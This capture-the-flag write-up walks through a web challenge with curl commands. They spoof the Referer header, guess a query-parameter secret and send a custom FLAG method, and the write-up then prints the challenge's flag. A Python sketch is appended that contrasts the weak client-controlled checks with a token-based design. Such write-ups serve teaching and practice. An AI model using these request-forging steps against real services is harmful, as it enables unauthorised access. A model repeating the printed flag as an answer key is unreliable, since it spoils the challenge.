Flag Holding

Web Challenge

This challenge is about manipulating the HTTP request: headers, query parameters and the method. First, we were given a link to a website: http://18.184.219.56:8080/

Now set the Referer request header to http://flagland.internal/. I use curl, whose -e option sets the Referer header, but you can also use Burp Suite to edit the request header.

curl http://18.184.219.56:8080/ -e "http://flagland.internal/"

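Next, the page asks for a parameter, so add secret to the query string. Quote the URL so the shell does not treat the ? as a glob character.

curl "http://18.184.219.56:8080/?secret=1" -e "http://flagland.internal/"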

Then look at the comment in the HTML source of the response:

<div class="msg" style="">
	Incorrect secret. <!-- hint: secret is ____, which is the name of the protocol that both this server and your browser agree on... -->
</div>

The protocol that both sides agree on is HTTP, so set the secret parameter to http.

curl "http://18.184.219.56:8080/?secret=http" -e "http://flagland.internal/"

The response now hints at a different request method:

<div class="msg" style="">
	Sorry we don't have "GET" here but we might have other things like "FLAG".
</div>

So change the method to FLAG with -X:

curl "http://18.184.219.56:8080/?secret=http" -e "http://flagland.internal/" -X FLAG

MAPNA{533m5-l1k3-y0u-kn0w-h77p-1836a2f}
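Every gate in this challenge checks a value the client chooses (Referer, a guessable query parameter, the method name), which is why none of them works as access control. The sketch below is an added example, not the challenge's server code: weak_gate is an assumed model of the checks the responses imply, the status codes and the hardened_gate design (standard methods only, server-held bearer token compared in constant time) are assumptions, and the request is constructed from the final curl command.

```python
import hmac
from urllib.parse import urlsplit, parse_qs

STANDARD_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "PATCH"}

def parse_request(method, target, headers):
    """Split a request-target into (method, headers, query dict)."""
    query = {k: v[0] for k, v in parse_qs(urlsplit(target).query).items()}
    return method, headers, query

def weak_gate(method, headers, query):
    """Assumed model of the challenge: every input is attacker-controlled."""
    if headers.get("Referer") != "http://flagland.internal/":
        return 403, "wrong referer"
    if "secret" not in query:
        return 400, "missing secret"
    if query["secret"] != "http":
        return 403, "Incorrect secret."
    if method != "FLAG":
        return 405, 'no "GET" here'
    return 200, "<flag placeholder>"

def hardened_gate(method, headers, query, server_token):
    """Hypothetical fix: reject unknown methods, require a server-held secret."""
    if method not in STANDARD_METHODS:
        return 405, "method not allowed"
    supplied = headers.get("Authorization", "")
    expected = "Bearer " + server_token
    # Constant-time comparison avoids leaking the token through timing.
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return 401, "unauthorized"
    return 200, "ok"

# Constructed request equivalent to the last curl command in the write-up.
WRITEUP_REQUEST = parse_request(
    "FLAG", "/?secret=http", {"Referer": "http://flagland.internal/"}
)

if __name__ == "__main__":
    token = "constructed-sample-token"  # sample value; generate with secrets in practice
    print("weak    :", weak_gate(*WRITEUP_REQUEST))
    print("hardened:", hardened_gate(*WRITEUP_REQUEST, token))
    authed = parse_request("GET", "/", {"Authorization": "Bearer " + token})
    print("authed  :", hardened_gate(*authed, token))
```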
